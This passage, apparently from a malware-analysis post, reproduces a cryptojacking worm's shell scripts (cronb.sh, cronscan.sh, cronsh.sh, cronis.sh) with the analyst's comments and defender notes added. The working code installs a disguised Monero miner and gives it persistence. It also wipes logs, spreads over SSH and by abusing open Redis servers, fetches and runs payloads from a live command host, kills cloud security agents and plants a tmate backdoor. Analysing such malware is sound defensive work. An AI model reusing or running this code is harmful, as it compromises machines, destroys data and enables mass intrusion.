apt-get install -y --reinstall curl 2>/dev/null 1>/dev/null
yum clean all 2>/dev/null 1>/dev/null
yum install -y curl 2>/dev/null 1>/dev/null
yum reinstall -y curl 2>/dev/null 1>/dev/null
fi
sleep 2
# Re-use an already present miner if it runs; otherwise call the helper.
$MOHOME/[kswapd0] --help >/dev/null
if (test $? -ne 0); then
SetupMoneroOcean1
else
echo "WARNING: Advanced version of $MOHOME/xmrig was removed by antivirus (or some other problem)"
fi
# "[kswapd0].pid" is the miner JSON config (see the sed edits further down).
if [ -f "$MOHOME/[kswapd0].pid" ]
then
echo "config file exists, neednot backup"
else
echo "config file not exists.download from teamtnt"
SetupMoneroOcean1
fi
# Fallback download of the miner from $miner_url / $miner_url_backup and of
# the config from $config_url (all defined outside this block).
if [ -f "$MOHOME/[kswapd0]" ]
then
echo "miner file exists"
else
curl -L --progress-bar $miner_url -o /tmp/xmrig.tar.gz && tar -xf /tmp/xmrig.tar.gz -C $MOHOME/ && mv $MOHOME/xmrig*/xmrig $MOHOME/\[kswapd0\]
fi
if [ -f "$MOHOME/[kswapd0].pid" ]
then
echo "miner config exists"
else
curl -L --progress-bar $config_url -o $MOHOME/\[kswapd0\].pid
fi
rm /tmp/xmrig.tar.gz
if [ -f "$MOHOME/[kswapd0]" ]
then
echo "miner file exists, neednot backup"
else
curl -L --progress-bar $miner_url_backup -o /tmp/xmrig.tar.gz && tar -xf /tmp/xmrig.tar.gz -C $MOHOME/ && chmod +x $MOHOME/\[kswapd0\]
fi
rm /tmp/cf.tar
# Config patching. First "url" entry -> elastic.zzhreceive.top:1414, second
# -> oracle.zzhreceive.top:1414 (these are the pool/proxy endpoints behind the
# outbound connections the post observed). Coin is forced to monero,
# "max-threads-hint" to 50 (a CPU cap -- consistent with the ~50% ni the post
# saw on a 2-core host, though that is an inference), logging goes to
# $MOHOME/[kswapd0].log and to syslog.
sed -i '0,/url/{s/"url": *"[^"]*",/"url": "elastic.zzhreceive.top:1414",/}' $MOHOME/[kswapd0].pid
sed -i ':a;N;$!ba;s/"url": *"[^"]*",/"url": "oracle.zzhreceive.top:1414",/2' $MOHOME/[kswapd0].pid
sed -i 's/"coin": *[^"]*,/"coin": "monero",/' $MOHOME/[kswapd0].pid
sed -i 's/"max-threads-hint": *[^,]*,/"max-threads-hint": 50,/' $MOHOME/[kswapd0].pid
sed -i 's#"log-file": *null,#"log-file": "'$MOHOME/[kswapd0].log'",#' $MOHOME/[kswapd0].pid
sed -i 's/"syslog": *[^,]*,/"syslog": true,/' $MOHOME/[kswapd0].pid
# Second config with "background": true for the .profile launch path.
cp $MOHOME/[kswapd0].pid $MOHOME/config_background.json
sed -i 's/"background": *false,/"background": true,/' $MOHOME/config_background.json
# preparing script
# Wrapper: start the miner under nice unless pidof already sees a
# "[kswapd0]" process. "\$*" is escaped so it expands when the wrapper runs.
echo "[*] Creating $MOHOME/[kswapd0].sh script"
cat >$MOHOME/[kswapd0].sh <<EOL
#!/bin/bash
if ! pidof [kswapd0] >/dev/null; then
nice $MOHOME/[kswapd0] \$*
else
echo "Monero miner is already running in the background. Refusing to run another one."
echo "Run \"killall xmrig\" or \"sudo killall xmrig\" if you want to remove background miner first."
fi
EOL
chmod +x $MOHOME/[kswapd0].sh
# preparing script background work and work under reboot
# Persistence choice: if "sudo -n true" fails (no sudo, or sudo needs a
# password) the wrapper is appended to /root/.profile -- the file the post
# found the scheduled jobs in -- and started once now.
if ! sudo -n true 2>/dev/null; then
if ! grep $MOHOME/[kswapd0].sh /root/.profile >/dev/null; then
echo "[*] Adding $MOHOME/[kswapd0].sh script to /root/.profile"
echo "$MOHOME/[kswapd0].sh --config=$MOHOME/config_background.json >/dev/null 2>&1" >>/root/.profile
else
echo "Looks like $MOHOME/[kswapd0].sh script is already in the /root/.profile"
fi
echo "[*] Running kswapd0 service in the background (see logs in $MOHOME/[kswapd0].log file)"
/bin/bash $MOHOME/[kswapd0].sh --config=$MOHOME/config_background.json >/dev/null 2>&1
else
# Otherwise: enable huge pages on hosts with more than ~3.5 GB RAM
# (MemTotal is in kB), then install a systemd unit when systemctl exists.
if [[ $(grep MemTotal /proc/meminfo | awk '{print $2}') > 3500000 ]]; then
echo "[*] Enabling huge pages"
echo "vm.nr_hugepages=$((1168+$(nproc)))" | sudo tee -a /etc/sysctl.conf
sudo sysctl -w vm.nr_hugepages=$((1168+$(nproc)))
fi
if ! type systemctl >/dev/null; then
/bin/bash $MOHOME/[kswapd0].sh --config=$MOHOME/config_background.json >/dev/null 2>&1
else
echo "[*] Creating kswapd0 systemd service"
# Restores the exec bit on systemctl (the script family strips exec bits
# from several system tools elsewhere; why systemctl needs this here is
# not visible in this block).
chmod +x /usr/bin/systemctl
# Unit runs the miner directly with the patched config; Nice=10 and
# CPUWeight=1 keep it low priority, which matches the "ni" CPU the post
# observed. Name and Description imitate the kernel swap daemon.
cat >/tmp/kswapd0.service <<EOL
[Unit]
Description=kswapd0 system service
[Service]
ExecStart=$MOHOME/[kswapd0] --config=$MOHOME/[kswapd0].pid
Restart=always
Nice=10
CPUWeight=1
[Install]
WantedBy=multi-user.target
EOL
sudo mv /tmp/kswapd0.service /etc/systemd/system/kswapd0.service
echo "[*] Starting kswapd0 systemd service"
# Kills any earlier instance before (re)enabling the unit at boot.
sudo killall [kswapd0] 2>/dev/null
sudo systemctl daemon-reload
sudo systemctl enable kswapd0.service
sudo systemctl start kswapd0.service
fi
fi
}
#######################################
# Anti-forensics plus SSH lateral movement.
# Truncates root's mail spool, wtmp (login history) and /var/log/secure
# (auth log). Then, if root has a known_hosts file and an RSA public key,
# it pulls every IPv4 address out of known_hosts and attempts a
# non-interactive SSH login to each (existing keys/agent only, host-key
# checking disabled, 5 s timeout), piping the C2 downloader into bash on the
# remote host. The second loop repeats this with the renamed curl ("cd1").
# Defender notes: after this runs, local login/auth logs on this host are
# unreliable -- rely on remote syslog or network logs. Every host present in
# /root/.ssh/known_hosts should be treated as possibly reached and checked
# for the same artefacts; key-based trust from this host should be revoked.
#######################################
localgo() {
# Truncate (not delete) the three log/spool files.
echo > /var/spool/mail/root
echo > /var/log/wtmp
echo > /var/log/secure
if [ -f /root/.ssh/known_hosts ] && [ -f /root/.ssh/id_rsa.pub ]; then
# Each ssh is backgrounded; the remote command itself is also backgrounded.
for h in $(grep -oE "\b([0-9]{1,3}\.){3}[0-9]{1,3}\b" /root/.ssh/known_hosts); do ssh -oBatchMode=yes -oConnectTimeout=5 -oStrictHostKeyChecking=no $h 'curl -o- http://oracle.zzhreceive.top/b2f628/b.sh | bash >/dev/null 2>&1 &' & done
fi
if [ -f /root/.ssh/known_hosts ] && [ -f /root/.ssh/id_rsa.pub ]; then
# Same loop using "cd1", the renamed curl this script family installs.
for h in $(grep -oE "\b([0-9]{1,3}\.){3}[0-9]{1,3}\b" /root/.ssh/known_hosts); do ssh -oBatchMode=yes -oConnectTimeout=5 -oStrictHostKeyChecking=no $h 'cd1 -o- http://oracle.zzhreceive.top/b2f628/b.sh | bash >/dev/null 2>&1 &' & done
fi
}
#######################################
# Disables Alibaba Cloud host security agents (aliyun / aegis / AliSecGuard).
# Detects Alibaba Cloud by an "aliyun" process, then loops until no process
# matching "dun" remains: stops the aliyun and aegis services and sends HUP
# to aegis processes. A second loop runs while /usr/local/aegis exists: HUPs
# AliSecGuard, asks it to stop its kernel driver (--stopdriver) and deletes
# the directory.
# Defender notes: a sudden loss of agent heartbeat from a cloud host is a
# detection signal in itself; agent removal should alert centrally, since
# local evidence is deleted here. The "[a]liyun" pattern is the usual trick
# to stop grep matching its own command line.
#######################################
clmo() {
if ps aux | grep -i '[a]liyun'; then
echo "this is ali cloud"
number=$(ps -ef|grep -i dun|grep -v grep|wc -l)
until [ "$number" -eq 0 ]; do
systemctl stop aliyun
systemctl stop aegis
ps -ef|grep -i aegis|awk '{print $2}'|xargs kill -HUP
number=$(ps -ef|grep -i dun|grep -v grep|wc -l)
done
while [ -d /usr/local/aegis ]
do
ps -ef|grep -i AliSecGuard|grep -v grep |awk '{print $2}'|xargs kill -HUP
# $NF of the ps line is taken as the AliSecGuard binary path.
path=$(ps -ef|grep AliSecGuard|grep -v grep|awk '{print $NF}')
num=$(ps -ef|grep AliSecGuard|grep -v grep|awk '{print $NF}'|wc -l)
if [ $num -gt 0 ]
then
echo "$path" exist
$path --stopdriver
else
echo "no AliSecGuard process"
fi
rm -rf /usr/local/aegis
done
else
echo "it's not ali cloud"
fi
}
#######################################
# Remote-access backdoor via tmate (a terminal-sharing tool).
# Clears the immutable/append-only bits on /, /var and /var/tmp, kills any
# running tmate, downloads a tmate binary to /tmp/tmate with whichever
# fetcher works (wget, curl, or the renamed cd1/wd1 copies), starts it in
# the foreground-daemon mode with an API key and a random session name, and
# reports that session name to the C2 under /address/<token> so the
# operator can attach.
# Defender notes: indicators are /tmp/tmate, /tmp/.tmbd, a process named
# tmate with "-F -k", and outbound connections to the tmate relay. Even after
# the miner is removed this gives interactive shell access, so the host
# should be considered fully compromised (the post's decision to rebuild is
# the right one).
#######################################
tmt() {
mkdir -p /var/tmp/ 2>/dev/null
chattr -ia / /var/ /var/tmp/ 2>/dev/null
pkill tmate 2>/dev/null
if [ ! -f "/tmp/tmate" ]; then wget http://bbq.zzhreceive.top/tmate -O /tmp/tmate; fi
if [ ! -f "/tmp/tmate" ]; then curl http://bbq.zzhreceive.top/tmate -o /tmp/tmate; fi
if [ ! -f "/tmp/tmate" ]; then cd1 http://bbq.zzhreceive.top/tmate -o /tmp/tmate; fi
if [ ! -f "/tmp/tmate" ]; then wd1 http://bbq.zzhreceive.top/tmate -o /tmp/tmate; fi
chmod +x /tmp/tmate
# Session name: awk random number + "O" + bash $RANDOM.
URLTOKEN=$(awk 'BEGIN{srand();print rand()*1000000}')"O"$RANDOM
/tmp/tmate -F -k tmk-4ST6GRXU6GPUjlXHfSlNe0ZaT2 -n $URLTOKEN >/tmp/.tmbd &
# Beacon the session name to the C2 with every available fetcher.
curl http://oracle.zzhreceive.top/address/"$URLTOKEN" >>/dev/null
wget http://oracle.zzhreceive.top/address/"$URLTOKEN" >>/dev/null
wd1 http://oracle.zzhreceive.top/address/"$URLTOKEN" >>/dev/null
cd1 http://oracle.zzhreceive.top/address/"$URLTOKEN" >>/dev/null
}
# Main sequence of cronb.sh. The functions called here are defined earlier
# in the script (KILLMININGSERVICES, makesshaxx, checksshkeys, back, hid,
# SecureTheSystem, FixTheSystem are outside this excerpt; "hid" is the part
# the post identifies as loading the Diamorphine rootkit module).
# Order: remove competing miners -> disable cloud agents -> install miner ->
# SSH persistence -> backdoor -> process hiding -> lock down system tools and
# files -> one-time lateral spread -> chain to cronis.sh -> wipe history.
KILLMININGSERVICES
clmo
SetupMoneroOcean
makesshaxx
checksshkeys
back
hid
SecureTheSystem
FixTheSystem
# /var/tmp/.alsp is a "first run" marker: spread via SSH once, then mark the
# host immutable-locked so re-runs exit early. The marker is itself an
# indicator of compromise; chattr -i is needed before it can be removed.
if [ ! -f "/var/tmp/.alsp" ]; then
localgo
echo 'lockfile' > /var/tmp/.alsp
# tntrecht is not visible in this excerpt; from its use next to chattr it
# is presumably a renamed copy of chattr (TODO confirm from the sample).
tntrecht +i /var/tmp/.alsp || chattr +i /var/tmp/.alsp
else
echo "replay .. i know this server ..."
exit
fi
echo ""
echo "[*] Setup complete"
# Second-stage fetch (cronis.sh, listed later in this post), once with curl
# and once with the renamed copy cd1.
curl -fsSL http://oracle.zzhreceive.top/b2f628fff19fda999999999/cronis.sh | bash
cd1 -fsSL http://oracle.zzhreceive.top/b2f628fff19fda999999999/cronis.sh | bash
# Clears the interactive shell history of the invoking shell.
history -c
## now the bad part of the script###
cronscan_sh
##### 下载来源:h*t*t*p://107.189.3.150/b2f628/cronscan.sh #####
# cronscan.sh: installs three systemd units -- scan, mass and mate -- whose
# ExecStart binaries live in /usr/share/ under bracketed names ([scan],
# [mass], [mate]) so they look like kernel threads in process listings.
# Note the first line is "#/bin/bash" (missing "!"), so it is a plain comment
# and the file runs under whatever shell the caller pipes it into.
# Defender notes: look for /etc/systemd/system/{scan,mass,mate}.service and
# /usr/share/[scan], [mass], [mate] (mode 744). Also note the closing "fi" at
# the very end has no matching "if" in this capture; possibly a
# transcription artefact.
#/bin/bash
# Pick a curl binary: "cd1" is the renamed copy created by cronis.sh.
if [ -f /bin/cd1 ];then
aabb=/bin/cd1
echo "cd1 exist"
elif [ -f /bin/curl ];then
aabb=/bin/curl
echo "curl exist"
elif [ -f /usr/bin/curl ];then
aabb=/usr/bin/curl
echo "curl exist"
elif [ -f /usr/bin/cd1 ];then
aabb=/usr/bin/cd1
echo "cd1 exist"
else
echo "curl not exist,use yum reinstall"
yum -y remove curl&&yum -y install curl
fi
# Same for wget / its renamed copy "wd1" (ccdd is not used further here).
if [ -f /bin/wd1 ];then
ccdd=/bin/wd1
echo "wd1 exist"
elif [ -f /bin/wget ];then
ccdd=/bin/wget
echo "wget exist"
else
echo "wget not exist,use yum reinstall"
yum -y remove wget&&yum -y install wget
fi
# Without systemd the scanner runs once via "| bash"; with systemd it becomes
# a restarting unit. (The unit has no [Unit] section and targets
# default.target.)
if ! type systemctl >/dev/null; then
$aabb -fsSL http://oracle.zzhreceive.top/b2f628/rss.sh | bash
else
echo "[*] Creating scan systemd service"
$aabb -fsSL http://oracle.zzhreceive.top/b2f628/cronrs.sh -o /usr/share/\[scan\] && chmod 744 /usr/share/\[scan\]
cat >/tmp/scan.service <<EOL
[Service]
ExecStart=/usr/share/[scan]
Restart=always
[Install]
WantedBy=default.target
EOL
sudo mv /tmp/scan.service /etc/systemd/system/scan.service
echo "[*] Starting scan systemd service"
sudo killall [scan] 2>/dev/null
sudo systemctl daemon-reload
sudo systemctl enable scan.service
sudo systemctl start scan.service
fi
# "mass" unit: the Docker-API scanner (c.sh, listed later as [mass]).
if ! type systemctl >/dev/null; then
$aabb -fsSL http://oracle.zzhreceive.top/b2f628/c.sh | bash
else
echo "[*] Creating mass systemd service"
$aabb -fsSL http://oracle.zzhreceive.top/b2f628/c.sh -o /usr/share/\[mass\] && chmod 744 /usr/share/\[mass\]
cat >/tmp/mass.service <<EOL
[Service]
ExecStart=/usr/share/[mass]
Restart=always
[Install]
WantedBy=default.target
EOL
sudo mv /tmp/mass.service /etc/systemd/system/mass.service
echo "[*] Starting mass systemd service"
sudo killall [mass] 2>/dev/null
sudo systemctl daemon-reload
sudo systemctl enable mass.service
sudo systemctl start mass.service
fi
# "mate" unit: the tmate backdoor, always installed as a unit (no systemctl
# check here).
$aabb -fsSL http://oracle.zzhreceive.top/service/tmate.sh -o /usr/share/\[mate\] && chmod 744 /usr/share/\[mate\]
cat >/tmp/mate.service <<EOL
[Service]
ExecStart=/usr/share/[mate]
Restart=always
[Install]
WantedBy=default.target
EOL
sudo mv /tmp/mate.service /etc/systemd/system/mate.service
echo "[*] Starting mate systemd service"
sudo killall [mate] 2>/dev/null
sudo systemctl daemon-reload
sudo systemctl enable mate.service
sudo systemctl start mate.service
fi
cronsh_sh
##### 下载来源:h*t*t*p://107.189.3.150/b2f628/cronsh.sh #####
#!/bin/bash
# cronsh.sh preamble. SELinux is switched to permissive, the process limit
# is raised for the scanner, and two iptables rules are inserted at the top
# of INPUT: accept Redis (6379) from localhost, drop it from everyone else.
# Defender notes: "setenforce 0" and new INPUT rules for 6379 are both
# auditable events; the firewall change is typically meant to keep other
# attackers (who exploit Redis the same way) away from this host's Redis.
setenforce 0 2>/dev/null
ulimit -u 50000
sleep 1
iptables -I INPUT 1 -p tcp --dport 6379 -j DROP 2>/dev/null
iptables -I INPUT 1 -p tcp --dport 6379 -s 127.0.0.1 -j ACCEPT 2>/dev/null
#######################################
# "Hardening" from the attacker's point of view: makes it harder for an
# administrator (or a rival) to investigate or recover the host.
# Part 1: for each diagnostic/network tool in SYSFILEARRAY, strip the execute
#   bit and set the immutable attribute (after first clearing it).
# Part 2: set the immutable attribute recursively on root's and users' .ssh
#   directories, passwd, shadow, sudoers and the sshd configuration, which
#   blocks removing the attacker's keys or changing accounts until "chattr -i"
#   is run.
# Defined here but not invoked within this script as captured (cronb.sh
# calls it). "tntrecht" is used alongside chattr and is presumably a renamed
# chattr (not visible in this excerpt).
# Defender notes: "ls -l" showing mode without x on pstree/netstat/ss/lsof
# and "lsattr" showing "i" on /etc/passwd are quick indicators; recovery needs
# "chattr -i" first. Note the "which" redirections apply to the assignment,
# not to the substitution, so the result is the same as an unredirected which.
#######################################
function SecureTheSystem(){
SYSFILEARRAY=(pstree kill pkill htop netstat ss lsof wget wge wdl curl cur cdl sysctl )
for SYSFILE in ${SYSFILEARRAY[@]}; do
SYSFILEBIN=`which $SYSFILE` 2>/dev/null 1>/dev/null
tntrecht -i $SYSFILEBIN 2>/dev/null 1>/dev/null
chattr -i $SYSFILEBIN 2>/dev/null 1>/dev/null
chmod -x $SYSFILEBIN 2>/dev/null 1>/dev/null
chattr +i $SYSFILEBIN 2>/dev/null 1>/dev/null
tntrecht +i $SYSFILEBIN 2>/dev/null 1>/dev/null
done
# "/home/*/.ssh/" is globbed at loop time because the expansion is unquoted.
SYSTEMFILEARRAY=("/root/.ssh/" "/home/*/.ssh/" "/etc/passwd" "/etc/shadow" "/etc/sudoers" "/etc/ssh/" "/etc/ssh/sshd_config")
for SYSTEMFILE in ${SYSTEMFILEARRAY[@]}; do
tntrecht +i -R $SYSTEMFILE 2>/dev/null 1>/dev/null
chattr +i -R $SYSTEMFILE 2>/dev/null 1>/dev/null
done
}
sleep 1
# Guard: only start the scanner if no pnscan process is visible. The script
# prefers /bin/ps.original, which suggests ps may have been replaced by a
# wrapper on the host (not visible here; see the post on process hiding).
if [ -f "/bin/ps.original" ]
then
ps.original -fe|grep pnscan |grep -v grep
else
ps -fe|grep pnscan |grep -v grep
fi
if [ $? -ne 0 ]
then
rm -rf .dat .shard .ranges .lan 2>/dev/null
sleep 1
# .dat is a Redis command script. It abuses an unauthenticated Redis that
# runs as root: CONFIG SET dir/dbfilename point the RDB dump at a cron
# location, SAVE writes the database (whose only key is a crontab line) as
# that file, and cron tolerates the surrounding binary junk. Targets written:
# /var/spool/cron/root, /var/spool/cron/crontabs/root, /etc/cron.d/zzh and
# /etc/crontab; the second batch of keys includes the "root" user field that
# /etc/cron.d and /etc/crontab require. Every entry re-fetches b.sh every
# 2-5 minutes with a different fetcher.
# Defender notes: this is the classic Redis-to-cron persistence. It fails if
# Redis is not reachable from the network, requires a password, runs as an
# unprivileged user (then SAVE into /etc or /var/spool/cron is denied), or
# has CONFIG renamed/disabled. "flushall" also destroys the victim's data.
echo 'config set dbfilename "backup.db"' > .dat
echo 'save' >> .dat
echo 'config set stop-writes-on-bgsave-error no' >> .dat
echo 'flushall' >> .dat
echo 'set backup1 "\n\n\n*/2 * * * * cd1 -fsSL http://oracle.zzhreceive.top/b2f628/b.sh | sh\n\n"' >> .dat
echo 'set backup2 "\n\n\n*/3 * * * * wget -q -O- http://oracle.zzhreceive.top/b2f628/b.sh | sh\n\n"' >> .dat
echo 'set backup3 "\n\n\n*/4 * * * * curl -fsSL http://oracle.zzhreceive.top/b2f628fff19fda999999999/b.sh | sh\n\n"' >> .dat
echo 'set backup4 "\n\n\n*/5 * * * * wd1 -q -O- http://oracle.zzhreceive.top/b2f628fff19fda999999999/b.sh | sh\n\n"' >> .dat
echo 'config set dir "/var/spool/cron/"' >> .dat
echo 'config set dbfilename "root"' >> .dat
echo 'save' >> .dat
echo 'config set dir "/var/spool/cron/crontabs"' >> .dat
echo 'save' >> .dat
echo 'flushall' >> .dat
echo 'set backup1 "\n\n\n*/2 * * * * root cd1 -fsSL http://oracle.zzhreceive.top/b2f628/b.sh | sh\n\n"' >> .dat
echo 'set backup2 "\n\n\n*/3 * * * * root wget -q -O- http://oracle.zzhreceive.top/b2f628/b.sh | sh\n\n"' >> .dat
echo 'set backup3 "\n\n\n*/4 * * * * root curl -fsSL http://oracle.zzhreceive.top/b2f628fff19fda999999999/b.sh | sh\n\n"' >> .dat
echo 'set backup4 "\n\n\n*/5 * * * * root wd1 -q -O- http://oracle.zzhreceive.top/b2f628fff19fda999999999/b.sh | sh\n\n"' >> .dat
echo 'config set dir "/etc/cron.d/"' >> .dat
echo 'config set dbfilename "zzh"' >> .dat
echo 'save' >> .dat
echo 'config set dir "/etc/"' >> .dat
echo 'config set dbfilename "crontab"' >> .dat
echo 'save' >> .dat
sleep 1
pnx=pnscan
[ -x /usr/local/bin/pnscan ] && pnx=/usr/local/bin/pnscan
[ -x /usr/bin/pnscan ] && pnx=/usr/bin/pnscan
# Internet-wide Redis scan with pnscan. The outer loop shuffles a fixed list
# of first octets, the inner loop shuffles second octets, so each pass
# covers one /16 on port 6379. The -W payload is the RESP-encoded "INFO"
# command ("*1\r\n$4\r\ninfo\r\n") and -R matches responses containing
# "os:Linux", i.e. only Linux Redis servers that answer without auth are
# kept. Matching "host port" pairs are then fed the .dat script through
# redis-cli, one background process per target. "while true" never exits,
# so in this version the masscan stages below it are not reached.
# Defender notes: on an infected host expect a long-lived pnscan process,
# very many outbound SYNs to tcp/6379, .r.<x>.<y>.o/.l files in the working
# directory, and a large number of short-lived redis-cli children.
while true; do
for x in $( echo -e "47\n39\n8\n121\n106\n120\n123\n65\n3\n101\n139\n99\n63\n81\n44\n18\n119\n100\n42\n49\n118\n54\n1\n50\n114\n182\n52\n13\n34\n112\n115\n111\n116\n16\n35\n117\n124\n59\n36\n103\n82\n175\n122\n129\n45\n152\n159\n113\n15\n61\n180\n172\n157\n60\n218\n176\n58\n204\n140\n184\n150\n193\n223\n192\n75\n46\n188\n183\n222\n14\n104\n27\n221\n211\n132\n107\n43\n212\n148\n110\n62\n202\n95\n220\n154\n23\n149\n125\n210\n203\n185\n171\n146\n109\n94\n219\n134" | sort -R ); do
for y in $( seq 0 255 | sort -R ); do
$pnx -t256 -R '6f 73 3a 4c 69 6e 75 78' -W '2a 31 0d 0a 24 34 0d 0a 69 6e 66 6f 0d 0a' $x.$y.0.0/16 6379 > .r.$x.$y.o
awk '/Linux/ {print $1, $3}' .r.$x.$y.o > .r.$x.$y.l
while read -r h p; do
cat .dat | redis-cli -h $h -p $p --raw &
done < .r.$x.$y.l
done
done
done
sleep 1
# masscan stages: a random 1/22000 shard of the whole IPv4 space, then a few
# fixed /16s (including RFC1918 ranges), then the host's own subnets widened
# to /16 from "ip a". masscan prints "... port 6379/tcp on <ip>"; the awk
# keeps "<ip> <port>" by trimming "/tcp".
masscan --max-rate 10000 -p6379 --shard $( seq 1 22000 | sort -R | head -n1 )/22000 --exclude 255.255.255.255 0.0.0.0/0 2>/dev/null | awk '{print $6, substr($4, 1, length($4)-4)}' | sort | uniq > .shard
sleep 1
while read -r h p; do
cat .dat | redis-cli -h $h -p $p --raw 2>/dev/null 1>/dev/null &
done < .shard
sleep 1
masscan --max-rate 10000 -p6379 192.168.0.0/16 172.16.0.0/16 116.62.0.0/16 116.232.0.0/16 116.128.0.0/16 116.163.0.0/16 2>/dev/null | awk '{print $6, substr($4, 1, length($4)-4)}' | sort | uniq > .ranges
sleep 1
while read -r h p; do
cat .dat | redis-cli -h $h -p $p --raw 2>/dev/null 1>/dev/null &
done < .ranges
sleep 1
# Local interface addresses, prefix rewritten to /16 -> lateral scan list.
ip a | grep -oE '([0-9]{1,3}.?){4}/[0-9]{2}' 2>/dev/null | sed 's/\/\([0-9]\{2\}\)/\/16/g' > .inet
sleep 1
masscan --max-rate 10000 -p6379 -iL .inet | awk '{print $6, substr($4, 1, length($4)-4)}' | sort | uniq > .lan
sleep 1
while read -r h p; do
cat .dat | redis-cli -h $h -p $p --raw 2>/dev/null 1>/dev/null &
done < .lan
sleep 60
rm -rf .dat .shard .ranges .lan 2>/dev/null
else
echo "root runing....."
fi
cronis_sh
##### 下载来源:h*t*t*p://107.189.3.150/b2f628/cronis.sh #####
#!/bin/bash
# cronis.sh, stage two: tool preparation for the scanners. Renames curl and
# wget, kills competing scanners, installs build dependencies, Redis, and
# unhide, kills processes that unhide reports as hidden, and plants immutable
# placeholder files in /usr/bin.
# rtdir is assigned but not used in this excerpt.
rtdir="/etc/svcupdates"
bbdir="/usr/bin/curl"
bbdira="/usr/bin/cd1"
ccdir="/usr/bin/wget"
ccdira="/usr/bin/wd1"
# curl -> cd1 and wget -> wd1 (via an intermediate name). This is why the
# scripts in this post invoke "cd1"/"wd1": the tools still exist under names
# that rival miners' cleanup routines and naive "which curl" checks miss.
# Defender notes: /usr/bin/cd1 and /usr/bin/wd1 existing while curl/wget are
# absent is a strong indicator; package verification (rpm -V / debsums) will
# flag the missing files.
mv /usr/bin/curl /usr/bin/url
mv /usr/bin/url /usr/bin/cd1
mv /usr/bin/wget /usr/bin/get
mv /usr/bin/get /usr/bin/wd1
# Random 3-7 s delay, then work from a hidden directory literally named
# "/tmp/.ice-unix/..." (three dots), world-writable.
sleep $( seq 3 7 | sort -R | head -n1 )
cd /tmp || cd /var/tmp
sleep 1
mkdir -p .ice-unix/... && chmod -R 777 .ice-unix && cd .ice-unix/...
sleep 1
# .watch acts as a re-entry lock: a second concurrent run removes it and
# exits; the first run deletes it again near the end of the script.
if [ -f .watch ]; then
rm -rf .watch
exit 0
fi
sleep 1
echo 1 > .watch
sleep 1
# Kill competing scanners/miners by name (including any stray redis-cli,
# which this family also uses itself).
ps x | awk '!/awk/ && /redisscan|ebscan|redis-cli/ {print $1}' | xargs kill -9 2>/dev/null
ps x | awk '!/awk/ && /barad_agent|masscan|\.sr0|clay|udevs|\.sshd|xig/ {print $1}' | xargs kill -9 2>/dev/null
sleep 1
# Toolchain for building masscan/pnscan from source, plus redis-tools and
# unhide. Package-manager activity of this kind on a production host is a
# useful audit signal (note "--exclude" is not an apt-get option).
if [ -x "$(command -v apt-get)" ]; then
export DEBIAN_FRONTEND=noninteractive
apt-get update -y --exclude=procps* psmisc*
apt-get install -y debconf-doc
apt-get install -y build-essential
apt-get install -y libpcap0.8-dev libpcap0.8
apt-get install -y libpcap*
apt-get install -y make
apt-get install -y gcc
apt-get install -y git
apt-get install -y redis-server
apt-get install -y redis-tools
apt-get install -y redis
apt-get install -y iptables
#apt-get install -y wget curl
apt-get install -y unhide
fi
if [ -x "$(command -v yum)" ]; then
yum update -y --exclude=procps* psmisc*
yum install -y epel-release
yum update -y --exclude=procps* psmisc*
yum install -y git
yum install -y iptables
yum install -y make
yum install -y gcc
yum install -y redis
yum install -y libpcap
yum install -y libpcap-devel
#yum install -y wget curl
yum install -y unhide
fi
sleep 1
echo "Software Installed"
# "unhide quick" lists PIDs hidden from ps; they are all killed -- presumably
# to evict processes hidden by a rival's rootkit, since this family hides
# its own miner only later (see "hid" in cronb.sh).
dddir="/usr/sbin/unhide"
$dddir quick |grep PID:|awk '{print $4}'|xargs -I % kill -9 % 2>/dev/null
# Six placeholder files in /usr/bin are overwritten with a single digit and
# made immutable. The names are not used by this family elsewhere in the
# post; presumably they belong to competing malware and the immutable junk
# file prevents it from dropping its binary there (TODO confirm).
# Defender notes: "lsattr /usr/bin" showing "i" on these names is an IoC.
chattr -i /usr/bin/ip6network
chattr -i /usr/bin/kswaped
chattr -i /usr/bin/irqbalanced
chattr -i /usr/bin/rctlcli
chattr -i /usr/bin/systemd-network
chattr -i /usr/bin/pamdicks
echo 1 > /usr/bin/ip6network
echo 2 > /usr/bin/kswaped
echo 3 > /usr/bin/irqbalanced
echo 4 > /usr/bin/rctlcli
echo 5 > /usr/bin/systemd-network
echo 6 > /usr/bin/pamdicks
chattr +i /usr/bin/ip6network
chattr +i /usr/bin/kswaped
chattr +i /usr/bin/irqbalanced
chattr +i /usr/bin/rctlcli
chattr +i /usr/bin/systemd-network
chattr +i /usr/bin/pamdicks
#######################################
# Download helper with a fallback URL.
# Arguments: $1 - primary URL; $2 - output path; $3 - fallback URL.
# Picks the first available fetcher in the order curl, cd1 (renamed curl),
# wget, wd1 (renamed wget). For the curl variants it first issues a HEAD
# request (10 s timeout) and uses $1 when the status is 200 or 405, otherwise
# $3; for the wget variants it tries $1 and then $3. Output is written to
# $2 via redirection (curl) or -O (wget).
# Note: in the callers visible in this post it is used as
# "downloads <url> | bash" with only one argument.
#######################################
downloads()
{
if [ -f "/usr/bin/curl" ]
then
echo $1,$2
http_code=`curl -I -m 10 -o /dev/null -s -w %{http_code} $1`
if [ "$http_code" -eq "200" ]
then
curl --connect-timeout 10 --retry 100 $1 > $2
elif [ "$http_code" -eq "405" ]
then
curl --connect-timeout 10 --retry 100 $1 > $2
else
curl --connect-timeout 10 --retry 100 $3 > $2
fi
elif [ -f "/usr/bin/cd1" ]
then
http_code = `cd1 -I -m 10 -o /dev/null -s -w %{http_code} $1`
if [ "$http_code" -eq "200" ]
then
cd1 --connect-timeout 10 --retry 100 $1 > $2
elif [ "$http_code" -eq "405" ]
then
cd1 --connect-timeout 10 --retry 100 $1 > $2
else
cd1 --connect-timeout 10 --retry 100 $3 > $2
fi
elif [ -f "/usr/bin/wget" ]
then
wget --timeout=10 --tries=100 -O $2 $1
if [ $? -ne 0 ]
then
wget --timeout=10 --tries=100 -O $2 $3
fi
elif [ -f "/usr/bin/wd1" ]
then
wd1 --timeout=10 --tries=100 -O $2 $1
if [ $? -eq 0 ]
then
wd1 --timeout=10 --tries=100 -O $2 $3
fi
fi
}
# Cloud security agent removal, second variant: Alibaba Cloud (aliyun /
# aegis / bcm-agent) via the vendor's own uninstall scripts, or Tencent
# Cloud (YunJing / stargate / barad) via their uninstallers.
# Defender notes: agent uninstall should be alertable from the cloud console;
# the host itself will no longer report.
if ps aux | grep -i '[a]liyun'; then
downloads http://update.aegis.aliyun.com/download/uninstall.sh | bash
downloads http://update.aegis.aliyun.com/download/quartz_uninstall.sh | bash
pkill aliyun-service
